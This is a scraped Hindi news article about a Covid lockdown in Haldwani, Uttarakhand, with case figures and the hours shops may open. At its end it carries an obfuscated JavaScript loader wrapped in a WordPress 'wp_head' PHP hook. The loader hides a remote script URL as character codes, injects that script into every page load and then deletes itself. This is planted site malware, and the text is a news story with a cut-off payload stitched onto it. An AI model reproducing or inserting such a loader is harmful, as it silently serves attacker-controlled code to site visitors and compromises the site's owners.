Saturday, July 27, 2024
spot_img

हल्द्वानी- यहां आज रहेगा पूर्ण लॉकडाउन, जिला प्रशासन ने लिया फैसला

उत्तराखंड में कोरोना का कहर लगातार जारी है। कोरोना संक्रमण की रोकथाम के लिए शासन ने भी कुछ जरूरी कदम उठाए हैं, लेकिन फिर भी कोरोना के मामलों में तेजी देखी जा रही है। शुक्रवार को भी प्रदेश में 4964 नए मामले दर्ज किए गए, जिसमें देहरादून में 1489,हरिद्वार में 706 और नैनीताल जनपद में 666 मामले दर्ज किए गए।

नैनीताल जनपद में भी कोरोना की रफ्तार बेकाबू होती जा रही है, जिसे देखते हुए जिला प्रशासन ने कड़े कदम उठाए हैं। बढ़ते कोरना मामलों पर रोकथाम हेतु जिला प्रशासन ने शनिवार को हल्द्वानी में व्यापारिक प्रतिष्ठानों को बंद रखने का निर्णय लिया है, इस दौरान सब्जी, फल, दूध की दुकानें सुबह 11:00 बजे तक खुलेंगे दवाइयों की दुकानों को दिनभर खोलने की छूट होगी।

कोरोना संक्रमण को फैलने से रोकने के लिए जिला प्रशासन द्वारा शनिवार को लॉकडाउन लगाने के फैसले का व्यापारियों ने भी समर्थन किया है। सिटी मजिस्ट्रेट ऋचा सिंह ने बताया है कि व्यापारियों से वार्ता के बाद शनिवार को बंद का निर्णय लिया गया है। इस दौरान सुबह 11:00 बजे तक दूध फल सब्जी पेट्रोल पंप खुले रहेंगे। दुकानदारों को गोविंद नियमों का पालन करना होगा बगैर मास्क पहने कोई भी दूधिया सब्जी नहीं भेज सकेगा सामाजिक दूरी का पालन अनिवार्य रूप से कराया जाएगा। हालांकि इस दौरान वाहनों के आवागमन में छूट होगी, ट्रांसपोर्ट नगर में सिर्फ वाहनों की मरम्मत के लिए मिस्त्री मौजूद रहेंगे।

हल्द्वानी शहर में बढ़ रहे कोरोना मामलों ने प्रशासन की चिंता बढ़ा दी है, शुक्रवार को यहां एमबीपीजी कॉलेज के भी 7 कर्मचारी पॉजिटिव पाए गए साथ ही 6 कर्मचारी संक्रमण के लक्षण होने के चलते हेम आइसोलेट हो गए। कॉलेज में बढ़ते संक्रमण को देखते हुए शीतकालीन अवकाश के दौरान जरूरी काम होने पर ही कॉलेज आने के निर्देश दिए गए हैं। बता दें कि एमबीपीजी कॉलेज चुनाव संचालन के लिए भी अधिग्रहित किया गया है, जिसके चलते प्रशासन की चिंता और अधिक बढ़ गई है। शुक्रवार को लालकुंआ क्षेत्र में भी कुल 58 लोग संक्रमित मिले, जिसमें सेंचुरी पेपर मिल, लालकुंआ नगर, बिंदुखत्ता, हल्दूचौड और मोटाहल्दू क्षेत्र के लोग भी शामिल हैं।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>